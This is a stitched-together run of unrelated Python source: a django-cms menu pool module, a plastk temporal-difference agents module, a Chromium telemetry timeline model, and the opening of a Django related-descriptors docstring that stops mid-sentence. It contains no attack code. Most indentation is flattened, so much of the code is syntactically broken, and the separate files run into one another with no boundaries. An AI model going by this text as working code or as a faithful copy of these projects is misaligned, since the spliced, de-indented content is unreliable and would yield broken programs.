# We need to create the namespace dict to avoid KeyErrors
done_nodes[node.namespace] = {}
# If we have seen the parent_id already...
        if node.parent_id in done_nodes[node.namespace]:
# Implicit parent namespace by menu.__name__
if not node.parent_namespace:
node.parent_namespace = menu_class_name
parent = done_nodes[node.namespace][node.parent_id]
parent.children.append(node)
node.parent = parent
# If it has a parent_id but we haven't seen it yet...
elif node.parent_id:
# We check for infinite loops here, by comparing the number of
# times we "saw" this node to the number of nodes in the list
if node._counter < list_total_length:
nodes.append(node)
# Never add this node to the final list until it has a real
# parent (node.parent)
should_add_to_final_list = False
if should_add_to_final_list:
final_nodes.append(node)
# add it to the "seen" list
done_nodes[node.namespace][node.id] = node
return final_nodes
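# A minimal sketch exercising _build_nodes_inner_for_one_menu with stub nodes.
# The Stub class only mimics the attributes the loop above reads; it is not
# part of the menus API, and the helper is never called.
def _example_build_nodes():
    class Stub(object):
        def __init__(self, id, parent_id=None):
            self.id = id
            self.parent_id = parent_id
            self.namespace = None
            self.parent_namespace = None
            self.parent = None
            self.children = []
    child = Stub(2, parent_id=1)
    root = Stub(1)
    # The child arrives before its parent, so it is re-queued until the
    # parent has been seen, then attached under it.
    final = _build_nodes_inner_for_one_menu([child, root], 'ExampleMenu')
    assert final == [root, child] and root.children == [child]
    return final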
class MenuPool(object):
def __init__(self):
self.menus = {}
self.modifiers = []
self.discovered = False
def discover_menus(self):
if self.discovered:
return
load('menu')
from menus.modifiers import register
register()
self.discovered = True
def clear(self, site_id=None, language=None, all=False):
'''
This invalidates the cache for a given menu (site_id and language)
'''
if all:
cache_keys = CacheKey.objects.get_keys()
else:
cache_keys = CacheKey.objects.get_keys(site_id, language)
to_be_deleted = cache_keys.distinct().values_list('key', flat=True)
cache.delete_many(to_be_deleted)
cache_keys.delete()
def register_menu(self, menu):
from menus.base import Menu
assert issubclass(menu, Menu)
if menu.__name__ in self.menus.keys():
raise NamespaceAllreadyRegistered(
"[%s] a menu with this name is already registered" % menu.__name__)
self.menus[menu.__name__] = menu()
def register_modifier(self, modifier_class):
from menus.base import Modifier
assert issubclass(modifier_class, Modifier)
if not modifier_class in self.modifiers:
self.modifiers.append(modifier_class)
def _build_nodes(self, request, site_id):
"""
This is slow. Caching must be used.
One menu is built per language and per site.
Namespaces: they are ID prefixes to avoid node ID clashes when plugging
multiple trees together.
- We iterate on the list of nodes.
- We store encountered nodes in a dict (with namespaces):
done_nodes[<namespace>][<node's id>] = node
- When a node has a parent defined, we lookup that parent in done_nodes
if it's found:
set the node as the node's parent's child (re-read this)
else:
the node is put at the bottom of the list
"""
# Cache key management
lang = get_language()
prefix = getattr(settings, "CMS_CACHE_PREFIX", "menu_cache_")
key = "%smenu_nodes_%s_%s" % (prefix, lang, site_id)
if request.user.is_authenticated():
key += "_%s_user" % request.user.pk
cached_nodes = cache.get(key, None)
if cached_nodes:
return cached_nodes
final_nodes = []
for menu_class_name in self.menus:
try:
nodes = self.menus[menu_class_name].get_nodes(request)
except NoReverseMatch:
# Apps might raise NoReverseMatch if an apphook does not yet
# exist, skip them instead of crashing
nodes = []
toolbar = getattr(request, 'toolbar', None)
if toolbar and toolbar.is_staff:
messages.error(request, _('Menu %s cannot be loaded. Please, make sure all its urls exist and can be resolved.') % menu_class_name)
logger.error("Menu %s could not be loaded." % menu_class_name, exc_info=True)
# nodes is a list of navigation nodes (page tree in cms + others)
final_nodes += _build_nodes_inner_for_one_menu(nodes, menu_class_name)
cache.set(key, final_nodes, get_cms_setting('CACHE_DURATIONS')['menus'])
# We need to have a list of the cache keys for languages and sites that
# span several processes - so we follow the Django way and share through
# the database. It's still cheaper than recomputing every time!
# This way we can selectively invalidate per-site and per-language,
        # since the cache is shared but the keys aren't.
CacheKey.objects.get_or_create(key=key, language=lang, site=site_id)
return final_nodes
def apply_modifiers(self, nodes, request, namespace=None, root_id=None, post_cut=False, breadcrumb=False):
if not post_cut:
nodes = self._mark_selected(request, nodes)
for cls in self.modifiers:
inst = cls()
nodes = inst.modify(request, nodes, namespace, root_id, post_cut, breadcrumb)
return nodes
def get_nodes(self, request, namespace=None, root_id=None, site_id=None, breadcrumb=False):
self.discover_menus()
if not site_id:
site_id = Site.objects.get_current().pk
nodes = self._build_nodes(request, site_id)
nodes = copy.deepcopy(nodes)
nodes = self.apply_modifiers(nodes, request, namespace, root_id, post_cut=False, breadcrumb=breadcrumb)
return nodes
def _mark_selected(self, request, nodes):
sel = None
for node in nodes:
node.sibling = False
node.ancestor = False
node.descendant = False
node.selected = False
            if request.path.startswith(node.get_absolute_url()):
if sel:
if len(node.get_absolute_url()) > len(sel.get_absolute_url()):
sel = node
else:
sel = node
else:
node.selected = False
if sel:
sel.selected = True
return nodes
def get_menus_by_attribute(self, name, value):
self.discover_menus()
found = []
        for menu_name, menu in self.menus.items():
            if hasattr(menu, name) and getattr(menu, name) == value:
                found.append((menu_name, menu.name))
return found
def get_nodes_by_attribute(self, nodes, name, value):
found = []
for node in nodes:
if node.attr.get(name, None) == value:
found.append(node)
return found
menu_pool = MenuPool()
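# Illustrative only: the registration pattern the pool expects, assuming the
# menus.base.Menu interface (a get_nodes(request) method returning a list of
# NavigationNodes). The helper is never called.
def _example_register_menu():
    from menus.base import Menu

    class ExampleMenu(Menu):
        def get_nodes(self, request):
            return []  # a real menu would return NavigationNode instances

    menu_pool.register_menu(ExampleMenu)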
"""
Temporal difference agents.
$Id: td.py,v 1.13 2006/04/07 23:24:57 jp Exp $
"""
from plastk.base import *
from plastk.params import *
from plastk.rl import Agent,is_terminal
from plastk.utils import mmax,weighted_sample,inf
from plastk import rand
import Numeric
from Numeric import nonzero,putmask,array,zeros,dot,argmax
from math import exp,log
class TDAgent(Agent):
"""
A generic temporal-difference (TD) agent with discrete actions.
To create a new TD agent, override this class and implement the methods
    .Q(sensation,action=None) and .update_Q(sensation,action,delta,on_policy=True).
Parameters:
alpha -- The learning rate, default = 0.1
gamma -- The discount factor, default = 1.0
lambda_ -- The eligibility discount factor, default = 0.0.
step_method -- The method for doing TD updates: 'sarsa' or 'q_learning'.
default = 'sarsa'
action_selection -- The action selection method, default 'epsilon_greedy'.
To change action selection, set this to the name of the new method,
e.g. 'softmax'.
initial_epsilon -- The starting epsilon for epsilon_greedy selection. (default=0.1)
min_epsilon -- The minimum (final) epsilon. (default = 0.0)
epsilon_half_life -- The half-life for epsilon annealing. (default = 1)
    initial_temperature -- The starting temperature for softmax (Boltzmann distribution)
selection. (default = 1.0)
min_temperature -- The min (final) temperature for softmax selection.
(default = 0.01)
temperature_half_life -- The temperature half-life for softmax selection
(default = 1)
actions -- The list of available actions - can be any Python object
that is understood as an action by the environment
"""
alpha = Magnitude(default=0.1)
gamma = Magnitude(default=1.0)
lambda_ = Magnitude(default=0.0)
step_method = Parameter(default="sarsa")
action_selection = Parameter(default="epsilon_greedy")
# epsilon-greedy selection parameters
initial_epsilon = Magnitude(default=0.1)
min_epsilon = Magnitude(default=0.0)
epsilon_half_life = Number(default=1, bounds=(0,None))
# softmax selection parameters
initial_temperature = Number(default=1.0, bounds=(0,None))
min_temperature = Number(default=0.01, bounds=(0,None))
temperature_half_life = Number(default=1, bounds=(0,None))
actions = Parameter(default=[])
prune_eligibility = Magnitude(default=0.001)
replacing_traces = Parameter(default=True)
history_log = Parameter(default=None)
allow_learning = Parameter(default=True)
def __init__(self,**args):
from plastk.utils import LogFile
super(TDAgent,self).__init__(**args)
self.nopickle.append('policy_fn')
self.policy_fn = getattr(self,self.action_selection)
self.total_steps = 0
if isinstance(self.history_log,str):
self._history_file = LogFile(self.history_log)
elif isinstance(self.history_log,file) or isinstance(self.history_log,LogFile):
self._history_file = self.history_log
def unpickle(self):
"""
Called automatically when the agent is unpickled. Sets
the action-selection function to its appropriate value.
"""
super(TDAgent,self).unpickle()
self.policy_fn = getattr(self,self.action_selection)
def __call__(self,sensation,reward=None):
"""
Do a step. Calls the function selected in self.step_method
and returns the action.
"""
step_fn = getattr(self,self.step_method+'_step')
action_index = step_fn(sensation,reward)
if self.history_log:
if reward is None:
self._history_file.write('start\n')
self._history_file.write(`sensation`+'\n')
self._history_file.write(`reward`+'\n')
if not is_terminal(sensation):
self._history_file.write(`action_index`+'\n')
return self.actions[action_index]
def Q(self,sensation,action=None):
"""
Return Q(s,a). If action is None, return an array
of Q-values for each action in self.actions
with the given sensation.
You must override this method to implement a TDAgent subclass.
"""
raise NYI
def update_Q(self,sensation,action,delta,on_policy=True):
"""
Update Q(sensation,action) by delta. on_policy indicates
whether the step that produced the update was on- or
off-policy. Any eligibility trace updates should be done from
within this method.
You must override this method to implement a TDAgent subclass.
"""
raise NYI
def sarsa_step(self,sensation,reward=None):
"""
Do a step using the SARSA update method. Selects an action,
computes the TD update and calls self.update_Q. Returns the
agent's next action.
"""
        if reward is None:
return self._start_episode(sensation)
rho = self.rho(reward)
next_action = self.policy(sensation)
if is_terminal(sensation):
value = 0
else:
value = self.Q(sensation,next_action)
last_value = self.Q(self.last_sensation,self.last_action)
delta = rho + (self.gamma * value - last_value)
self.verbose("controller step = %d, rho = %.2f"
% (self.total_steps,rho))
self.verbose(("Q(t-1) = %.5f, Q(t) = %.5f, diff = %.5f,"+
"delta = %.5f, terminal? = %d")
% (last_value,value,value-last_value,
delta,is_terminal(sensation)))
if self.allow_learning:
self.update_Q(self.last_sensation,self.last_action,delta)
self.last_sensation = sensation
self.last_action = next_action
if isinstance(reward,list):
self.total_steps += len(reward)
else:
self.total_steps += 1
return next_action
def q_learning_step(self,sensation,reward=None):
"""
Do a step using Watkins' Q(\lambda) update method. Selects an
action, computes the TD update and calls
self._q_learning_training. Returns the agent's next action.
"""
        if reward is None:
return self._start_episode(sensation)
if self.allow_learning:
self._q_learning_training(self.last_sensation,self.last_action,reward,sensation)
self.last_sensation = sensation
self.last_action = self.policy(sensation)
if isinstance(reward,list):
self.total_steps += len(reward)
else:
self.total_steps += 1
return self.last_action
def _q_learning_training(self,sensation,action,reward,next_sensation):
"""
Do a single Q-lambda training step given (s,a,r,s'). Can be
called from outside the q_learning_step method for off-policy
training, experience replay, etc.
"""
rho = self.rho(reward)
last_Q = self.Q(sensation)
last_value = last_Q[action]
if is_terminal(next_sensation):
value = 0
else:
value = max(self.Q(next_sensation))
delta = rho + (self.gamma * value - last_value)
self.verbose("r = %.5f, Q(t-1) = %.5f, Q(t) = %.5f, diff = %.5f, delta = %.5f, terminal? = %d"
% (rho,last_value,value,value-last_value,delta,is_terminal(next_sensation)))
self.update_Q(sensation,action,delta,on_policy = (last_Q[action] == max(last_Q)))
if delta:
assert (self.Q(sensation,action) - last_value)/delta < 1.0
def _start_episode(self,sensation):
"""
Start a new episode. Called from self.__call__ when the reward is None.
"""
self.last_sensation = sensation
self.last_action = self.policy(sensation)
return self.last_action
def policy(self,sensation):
"""
Given a sensation, return an action. Uses
self.action_selection to get a distribution over the agent's
actions. Uses self.applicable_actions to prevent selecting
inapplicable actions.
Returns 0 if is_terminal(sensation).
"""
if not is_terminal(sensation):
actions = self.applicable_actions(sensation)
return actions[weighted_sample(self.policy_fn(sensation,actions))]
else:
# In the terminal state, the action is irrelevant
return 0
def epsilon_greedy(self,sensation,applicable_actions):
"""
        Given self.epsilon() and self.Q(), return a distribution over
        applicable_actions as an array where each element contains the
        probability mass for the corresponding action. I.e. the action
        with the highest Q gets p = 1 - self.epsilon() and the others
        share self.epsilon() uniformly (ties split the greedy mass).
"""
Q = array([self.Q(sensation,action) for action in applicable_actions])
# simple epsilon-greedy policy
# get a vector with a 1 where each max element is, zero elsewhere
mask = (Q == mmax(Q))
num_maxes = len(nonzero(mask))
num_others = len(mask) - num_maxes
if num_others == 0: return mask
e0 = self.epsilon()/num_maxes
e1 = self.epsilon()/num_others
result = zeros(len(mask))+0.0
putmask(result,mask,1-e0)
putmask(result,mask==0,e1)
return result
def softmax(self,sensation,applicable_actions):
"""
        Given self.temperature() and self.Q(), return a Boltzmann
        distribution over applicable_actions as an array where each
        element contains the probability mass for the corresponding
        action.
"""
temp = self.temperature()
self.verbose("softmax, temperature = %.3f" % temp)
Q = array([self.Q(sensation,action) for action in applicable_actions])
return softmax(Q,temp)
def normalized_softmax(self,sensation,applicable_actions):
"""
Like softmax, except that the Q values are scaled into the
range [0,1]. May make setting the initial temperature easier than with softmax.
"""
temp = self.temperature()
self.verbose("softmax, temperature = %.3f" % temp)
Q = array([self.Q(sensation,action) for action in applicable_actions])
return softmax(normalize_minmax(Q),temp)
def temperature(self):
"""
Using initial_temperature, min_temperature, and temperature_half_life,
        compute the temperature after self.total_steps steps.
"""
Ti = self.initial_temperature
Tm = self.min_temperature
decay = log(2)/self.temperature_half_life
return Tm + (Ti - Tm) * exp( -decay * self.total_steps )
def epsilon(self):
"""
Using initial_epsilon, min_epsilon, and epsilon_half_life,
        compute epsilon after self.total_steps steps.
"""
Ei = self.initial_epsilon
Em = self.min_epsilon
decay = log(2)/self.epsilon_half_life
return Em + (Ei - Em) * exp( -decay * self.total_steps )
def rho(self,reward):
"""
Compute the reward since the last step.
        If the reward is a scalar, it is returned unchanged.
If reward is a list, it is assumed to be a list of rewards
accrued at a constant time step, and the discounted sum is
returned.
"""
if isinstance(reward,list):
result = 0
for r in reward:
result = self.gamma*result + r
else:
result = reward
return result
def applicable(self,action,sensation):
"""
If the given action has a method called 'applicable' return
the value of action.applicable(sensation), otherwise return True.
"""
        if hasattr(action, 'applicable'):
return action.applicable(sensation)
else:
return True
def applicable_actions(self,sensation):
"""
Return a list of the actions that are applicable to the given
sensation.
"""
return [a for a in range(len(self.actions))
if self.applicable(self.actions[a],sensation)]
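# A worked sketch of the TDAgent interface above; the subclass, action names
# and Q-values are hypothetical. With epsilon = 0.1 (its exact value at step 0)
# and Q = [1.0, 0.5, 0.5], epsilon_greedy gives the greedy action mass
# 1 - 0.1 = 0.9 and splits the remaining 0.1 over the other two actions.
class _ExampleAgent(TDAgent):
    """Illustrative only: the smallest possible TDAgent subclass."""
    def Q(self,sensation,action=None):
        q = [1.0, 0.5, 0.5]  # hypothetical action values
        if action is None:
            return array(q)
        return q[action]
    def update_Q(self,sensation,action,delta,on_policy=True):
        pass  # no learning in this sketch
# agent = _ExampleAgent(actions=['left','right','stay'])
# agent.epsilon_greedy('s', [0, 1, 2])  # -> [0.9, 0.05, 0.05]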
class LinearTDAgent(TDAgent):
"""
A TD agent that takes a sensation as a 1D Numeric vector of
features and computes Q as a linear function of that sensation,
using simple gradient descent. The function is stored in the
weight matrix self.w, such that Q(s) can be computed as w*s.
Assumes a discrete set of actions. Uses replacing eligibility
traces.
Parameters:
num_features = The number of input features (default = 1)
initial_w = A scalar value with which to initialize the weight
matrix.
"""
num_features = PositiveInt(default=1)
initial_w = Number(default=0.0)
def __init__(self,**params):
super(LinearTDAgent,self).__init__(**params)
self.reset_w()
self.reset_e()
def _start_episode(self,sensation):
self.reset_e()
return super(LinearTDAgent,self)._start_episode(sensation)
def reset_w(self):
"""
Reset the weight matrix to self.initial_w.
"""
self.w = zeros((len(self.actions),self.num_features),'f') + self.initial_w
def reset_e(self):
"""
Reset the eligibility traces for self.w to all zeros.
"""
self.e = zeros((len(self.actions),self.num_features),'f') + 0.0
def Q(self,state,action=None):
"""
Compute Q(s,a) from W*s.
"""
if action is None:
return dot(self.w, state)
else:
return dot(self.w[action],state)
def update_Q(self,sensation,action,delta,on_policy=True):
"""
Do a linear update of the weights.
"""
if self.lambda_ and on_policy:
self.e *= self.lambda_
if self.prune_eligibility > 0.0:
self.e *= (self.e > self.prune_eligibility)
else:
self.e *= 0.0
self.e[action] += sensation
if self.replacing_traces:
putmask(self.e,self.e > 1,1)
self.w += self.e * (self.alpha/(sum(sensation))) * delta
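# A minimal numeric sketch of the linear Q computation above; the weights and
# features are hypothetical and the helper is never called. With initial_w =
# 0.5, num_features = 3 and two actions, every row of w is [0.5, 0.5, 0.5],
# so the feature vector [1, 0, 1] yields Q = [1.0, 1.0].
def _example_linear_q():
    agent = LinearTDAgent(actions=['a','b'], num_features=3, initial_w=0.5)
    s = array([1.0, 0.0, 1.0])  # sparse feature vector
    return agent.Q(s)           # dot(w, s) -> [1.0, 1.0]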
class TabularTDAgent(TDAgent):
"""
A TDAgent for environments with discrete states and actions.
Sensations/states can be any hashable Python object, and the
universe of sensations need not be specified in advance. The agent
stores and updates a separate Q estimate for every (s,a) pair.
Parameters:
initial_q -- The initial Q estimate for each (s,a) pair. (default = 0.0)
"""
initial_q = Number(default=0.0)
def __init__(self,**params):
super(TabularTDAgent,self).__init__(**params)
self.reset_q()
self.reset_e()
def _start_episode(self,sensation):
self.reset_e()
return super(TabularTDAgent,self)._start_episode(sensation)
def reset_q(self):
self.q_table = {}
def reset_e(self):
self.e = {}
def Q(self,s,a=None):
if a is None:
result = [self.Q(s,a) for a in range(len(self.actions))]
else:
result = self.q_table.get((s,a),self.initial_q)
self.debug('Q(',s,',',a,') = ',result)
return result
def update_Q(self,s,a,delta,on_policy=True):
if not on_policy:
self.reset_e()
if (s,a) not in self.q_table:
self.q_table[(s,a)] = self.initial_q
if self.lambda_:
to_be_deleted = []
for x in self.e:
self.e[x] *= self.lambda_
if self.e[x] < self.prune_eligibility:
to_be_deleted.append(x)
for x in to_be_deleted:
del self.e[x]
if self.replacing_traces:
self.e[(s,a)] = 1
else:
self.e[(s,a)] += 1
for x,e in self.e.iteritems():
self.q_table[x] += self.alpha * e * delta
class TabularMemoryTDAgent(TabularTDAgent):
"""
A Tabular TD agent that keeps a memory of the last N steps of
sensations and actions, and does Q learning/sarsa using the
contents of memory as its state.
"""
memory_steps = NonNegativeInt(default=1)
def __init__(self,**params):
super(TabularMemoryTDAgent,self).__init__(**params)
self._memory = []
def __call__(self,sensation,reward=None):
if reward is None:
self._memory = [sensation]
else:
self._memory.append(sensation)
if is_terminal(sensation):
return super(TabularMemoryTDAgent,self).__call__(sensation,reward)
else:
action = super(TabularMemoryTDAgent,self).__call__(tuple(self._memory),reward)
assert self.actions[self.last_action] == action
self._memory.append(self.last_action)
if len(self._memory) > (2*self.memory_steps + 1):
del self._memory[0:2]
return action
class LinearTabularTDAgent(LinearTDAgent):
"""
Subclass of LinearTDAgent for 'tabular' environments. Assumes the
state/sensation is a single integer. Use the num_features
parameter inherited from LinearTDAgent to specify the total number
of states/sensations.
"""
def __call__(self,sensation,reward=None):
if not is_terminal(sensation):
assert(type(sensation) == int)
s = zeros(self.num_features)
s[sensation] = 1.0
else:
s = sensation
return super(LinearTabularTDAgent,self).__call__(s,reward)
class LinearListAgent(LinearTDAgent):
"""
    A subclass of LinearTDAgent where the sensation is assumed to be a
list of discrete features. For sparse feature representations,
this is more compact than the feature-vector representation of
LinearTDAgent.
"""
def __call__(self,sensation,reward=None):
if is_terminal(sensation):
new_sensation = sensation
else:
new_sensation = zeros(self.num_features,'f')
for f in sensation:
new_sensation[f] = 1
return super(LinearListAgent,self).__call__(new_sensation,reward)
class UniformTiledAgent(LinearListAgent):
"""
A LinearTDAgent subclass for continuous state spaces that
automatically tiles the input space. For high-dimensional inputs,
the input can be separated into a several uniformly distributed
'receptive fields' (rfs) that may overlap, and each rf is tiled
separately.
Parameters:
num_rfs -- The number of receptive fields to use (default=1)
rf_width -- The width of the receptive fields
(default=[D/num_rfs] where D = input dimensionality)
num_tilings -- The number of tilings to use for each rf.
tile_width -- The width of each tile.
num_features -- The total combined memory size for all rfs.
Each separate rf is assumed to use the same tiling parameters.
Examples:
D = 9 , num_rfs = 3, rf_width = <default> will give the following
|-rf0-| |-rf2-|
Features: [ 0 1 2 3 4 5 6 7 8 ]
|-rf1-|
D = 10 , num_rfs = 3, rf_width = 4 will give the following
|--rf0--| |--rf2--|
Features: [ 0 1 2 3 4 5 6 7 8 9 ]
|--rf1--|
RF placements are determined with function place_rfs.
"""
num_rfs = PositiveInt(default=1)
rf_width = Parameter(None)
num_tilings = PositiveInt(default=1)
tile_width = Number(default=1)
def __init__(self,**args):
super(UniformTiledAgent,self).__init__(**args)
if not self.rf_width:
self.rf_width = self.num_features/self.num_rfs
def __call__(self,sensation,reward=None):
if not is_terminal(sensation):
sensation = tile_uniform_rfs(array(sensation)/self.tile_width,
self.num_rfs,
self.rf_width,
self.num_tilings,
self.num_features/self.num_rfs)
return super(UniformTiledAgent,self).__call__(sensation,reward)
##################################
# utility functions
def softmax(ar,temp):
"""
    Given an array and a temperature, return the Boltzmann distribution
    over that array.
    For an array X and temp T, returns a new array containing
    exp(X_i/T)/sum_j(exp(X_j/T)) for all X_i.
If temp == 0 or any value in the array is inf, the function
returns the limit value as T -> 0.
"""
if temp == 0 or inf in ar:
v = (ar == mmax(ar))
return v/float(sum(v))
else:
numer = Numeric.exp(ar/float(temp))
denom = Numeric.sum(numer)
return numer/denom
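# Worked example of softmax with hypothetical values: for ar = [1, 2, 3] and
# temp = 1 the result is exp(ar)/sum(exp(ar)) ~= [0.090, 0.245, 0.665]; with
# temp = 0 all mass collapses onto the maximum. Never called.
def _example_softmax():
    warm = softmax(array([1.0, 2.0, 3.0]), 1.0)   # ~ [0.090, 0.245, 0.665]
    greedy = softmax(array([1.0, 2.0, 3.0]), 0)   # [0.0, 0.0, 1.0]
    return warm, greedy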
def normalize_minmax(ar):
"""
Return the array ar scaled so that the min value is 0 and the max
value is 1.
"""
x = ar - min(ar)
mmax = max(x)
if mmax == 0:
return x
return x/mmax
def ranseq(x):
"""
Generator that gives a random-length sequence of the integers
ascending from 0. The length is selected from the uniform
distribution over the range [0,x).
"""
for i in range(int(rand.uniform(0,x))):
yield i
def tile_rfs(vec,specs):
"""
Tile vec into several rfs, rfs are specified as a list of tuples:
(slice_start,slice_end,num_tilings,memory_size).
"""
from plastk.rl.tiles import getTiles
result = []
offset = 0
for i,(start,end,num_tilings,memory_size) in enumerate(specs):
F = getTiles(num_tilings,memory_size,vec[start:end])
result += [x + offset for x in F]
offset += memory_size
return result
def tile_uniform_rfs(vec,num_rfs,rf_width,num_tilings,memory_size):
"""
Tile vector vec into several approximately uniformly spaced
receptive fields of equal width.
num_rfs = the number of rfs
rf_width = the width of each rf
num_tilings = the number of tilings for each rf
memory_size = the memory size for each rf
Function uses place_rfs to determine rf positions.
"""
specs = [(start,end,num_tilings,memory_size)
for start,end in place_rfs(len(vec),num_rfs,rf_width)]
return tile_rfs(vec,specs)
def place_rfs(length,count,width):
"""
    Returns a list of (start, end) index tuples giving the position of
    each receptive field in the input vector.
params
length = the length of the input vector
count = the number of rfs
width = the width of each rf
The rfs will be placed such that the first begins at 0 and the
last ends at length - 1. The rest will be (approximately) evenly
spaced in between. i.e. in 0..(length - width) step (length -
width)/(count - 1)
Note that they're assumed to overlap!
"""
if count==1:
return [(0,length)]
end_pos = length-width
step = int(round(end_pos / (count - 1.0)))
pos = 0
result = []
for i in range(count-1):
result.append((pos,pos+width))
pos += step
result.append((end_pos,end_pos+width))
return result
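# Concrete check of the docstring examples above; never called.
def _example_place_rfs():
    # D = 9, count = 3, width = 3: fields tile the vector exactly.
    assert place_rfs(9, 3, 3) == [(0, 3), (3, 6), (6, 9)]
    # D = 10, count = 3, width = 4: neighboring fields overlap by one.
    assert place_rfs(10, 3, 4) == [(0, 4), (3, 7), (6, 10)]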
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A container for timeline-based events and traces that can handle importing
raw event data from different sources. This model closely resembles that in the
trace_viewer project:
https://code.google.com/p/trace-viewer/
'''
from operator import attrgetter
import telemetry.timeline.process as tracing_process
# Register importers for data
from telemetry.timeline import bounds
from telemetry.timeline import empty_timeline_data_importer
from telemetry.timeline import inspector_importer
from telemetry.timeline import trace_event_importer
_IMPORTERS = [
empty_timeline_data_importer.EmptyTimelineDataImporter,
inspector_importer.InspectorTimelineImporter,
trace_event_importer.TraceEventTimelineImporter
]
class MarkerMismatchError(Exception):
def __init__(self):
super(MarkerMismatchError, self).__init__(
'Number or order of timeline markers does not match provided labels')
class MarkerOverlapError(Exception):
def __init__(self):
super(MarkerOverlapError, self).__init__(
'Overlapping timeline markers found')
class TimelineModel(object):
def __init__(self, timeline_data=None, shift_world_to_zero=True):
""" Initializes a TimelineModel. timeline_data can be a single TimelineData
object, a list of TimelineData objects, or None. If timeline_data is not
None, all events from it will be imported into the model. The events will
be shifted such that the first event starts at time 0, if
shift_world_to_zero is True.
"""
self._bounds = bounds.Bounds()
self._thread_time_bounds = {}
self._processes = {}
self._browser_process = None
self._frozen = False
self._tab_ids_to_renderer_threads_map = {}
self.import_errors = []
self.metadata = []
self.flow_events = []
if timeline_data is not None:
self.ImportTraces(timeline_data, shift_world_to_zero=shift_world_to_zero)
@property
def bounds(self):
return self._bounds
@property
def thread_time_bounds(self):
return self._thread_time_bounds
@property
def processes(self):
return self._processes
@property
#pylint: disable=E0202
def browser_process(self):
return self._browser_process
@browser_process.setter
#pylint: disable=E0202
def browser_process(self, browser_process):
self._browser_process = browser_process
def AddMappingFromTabIdToRendererThread(self, tab_id, renderer_thread):
if self._frozen:
raise Exception('Cannot add mapping from tab id to renderer thread once '
'trace is imported')
self._tab_ids_to_renderer_threads_map[tab_id] = renderer_thread
def ImportTraces(self, timeline_data, shift_world_to_zero=True):
if self._frozen:
raise Exception("Cannot add events once trace is imported")
importers = []
if isinstance(timeline_data, list):
for item in timeline_data:
importers.append(self._CreateImporter(item))
else:
importers.append(self._CreateImporter(timeline_data))
importers.sort(cmp=lambda x, y: x.import_priority - y.import_priority)
for importer in importers:
# TODO: catch exceptions here and add it to error list
importer.ImportEvents()
self.FinalizeImport(shift_world_to_zero, importers)
def FinalizeImport(self, shift_world_to_zero=False, importers=None):
    if importers is None:
importers = []
self.UpdateBounds()
if not self.bounds.is_empty:
for process in self._processes.itervalues():
process.AutoCloseOpenSlices(self.bounds.max,
self.thread_time_bounds)
for importer in importers:
importer.FinalizeImport()
for process in self.processes.itervalues():
process.FinalizeImport()
if shift_world_to_zero:
self.ShiftWorldToZero()
self.UpdateBounds()
    # Now that the import is finalized, prevent the timeline from being
    # modified.
self._frozen = True
def ShiftWorldToZero(self):
self.UpdateBounds()
if self._bounds.is_empty:
return
shift_amount = self._bounds.min
for event in self.IterAllEvents():
event.start -= shift_amount
def UpdateBounds(self):
self._bounds.Reset()
for event in self.IterAllEvents():
self._bounds.AddValue(event.start)
self._bounds.AddValue(event.end)
self._thread_time_bounds = {}
for thread in self.GetAllThreads():
self._thread_time_bounds[thread] = bounds.Bounds()
for event in thread.IterEventsInThisContainer():
        if event.thread_start is not None:
          self._thread_time_bounds[thread].AddValue(event.thread_start)
        if event.thread_end is not None:
          self._thread_time_bounds[thread].AddValue(event.thread_end)
def GetAllContainers(self):
containers = []
def Iter(container):
containers.append(container)
for container in container.IterChildContainers():
Iter(container)
for process in self._processes.itervalues():
Iter(process)
return containers
def IterAllEvents(self):
for container in self.GetAllContainers():
for event in container.IterEventsInThisContainer():
yield event
def GetAllProcesses(self):
return self._processes.values()
def GetAllThreads(self):
threads = []
for process in self._processes.values():
threads.extend(process.threads.values())
return threads
def GetAllEvents(self):
return list(self.IterAllEvents())
def GetAllEventsOfName(self, name, only_root_events=False):
events = [e for e in self.IterAllEvents() if e.name == name]
if only_root_events:
      return filter(lambda ev: ev.parent_slice is None, events)
else:
return events
def GetEventOfName(self, name, only_root_events=False,
fail_if_more_than_one=False):
events = self.GetAllEventsOfName(name, only_root_events)
if len(events) == 0:
raise Exception('No event of name "%s" found.' % name)
if fail_if_more_than_one and len(events) > 1:
raise Exception('More than one event of name "%s" found.' % name)
return events[0]
def GetOrCreateProcess(self, pid):
if pid not in self._processes:
assert not self._frozen
self._processes[pid] = tracing_process.Process(self, pid)
return self._processes[pid]
def FindTimelineMarkers(self, timeline_marker_names):
"""Find the timeline events with the given names.
If the number and order of events found does not match the names,
raise an error.
"""
# Make sure names are in a list and remove all None names
if not isinstance(timeline_marker_names, list):
timeline_marker_names = [timeline_marker_names]
names = [x for x in timeline_marker_names if x is not None]
# Gather all events that match the names and sort them.
events = []
name_set = set()
for name in names:
name_set.add(name)
for name in name_set:
events.extend(self.GetAllEventsOfName(name, True))
events.sort(key=attrgetter('start'))
# Check if the number and order of events matches the provided names,
# and that the events don't overlap.
if len(events) != len(names):
raise MarkerMismatchError()
for (i, event) in enumerate(events):
if event.name != names[i]:
raise MarkerMismatchError()
for i in xrange(0, len(events)):
for j in xrange(i+1, len(events)):
if (events[j].start < events[i].start + events[i].duration):
raise MarkerOverlapError()
return events
def GetRendererProcessFromTabId(self, tab_id):
renderer_thread = self.GetRendererThreadFromTabId(tab_id)
if renderer_thread:
return renderer_thread.parent
return None
def GetRendererThreadFromTabId(self, tab_id):
return self._tab_ids_to_renderer_threads_map.get(tab_id, None)
def _CreateImporter(self, event_data):
for importer_class in _IMPORTERS:
if importer_class.CanImport(event_data):
return importer_class(self, event_data)
raise ValueError("Could not find an importer for the provided event data")
|
|
"""
Accessors for related objects.
When a field defines a relation between two models, each model class provides
an attribute to access related instances of the other model class (unless the
reverse accessor has been disabled with related_name='+').
Accessors are implemented as descriptors in order to customize access and
assignment. This module defines the descriptor classes.
Forward accessors follow foreign keys. Reverse accessors trace them back. For
example, with the following models::
class Parent(Model):
pass
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``child.parent`` is a forward many-to-one relation. ``parent.children`` is a
reverse many-to-one relation.
There are three types of relations (many-to-one, one-to-one, and many-to-many)
and two directions (forward and reverse) for a total of six combinations.
1. Related instance on the forward side of a many-to-one or one-to-one
relation: ``ForwardManyToOneDescriptor``.
Uniqueness of foreign key values is irrelevant to accessing the related
instance, making the many-to-one and one-to-one cases identical as far as
   the descriptor is concerned. The constraint is checked upstream (uniqueness
   validation in forms) or downstream (unique indexes in the database).
If you're looking for ``ForwardOneToOneDescriptor``, use
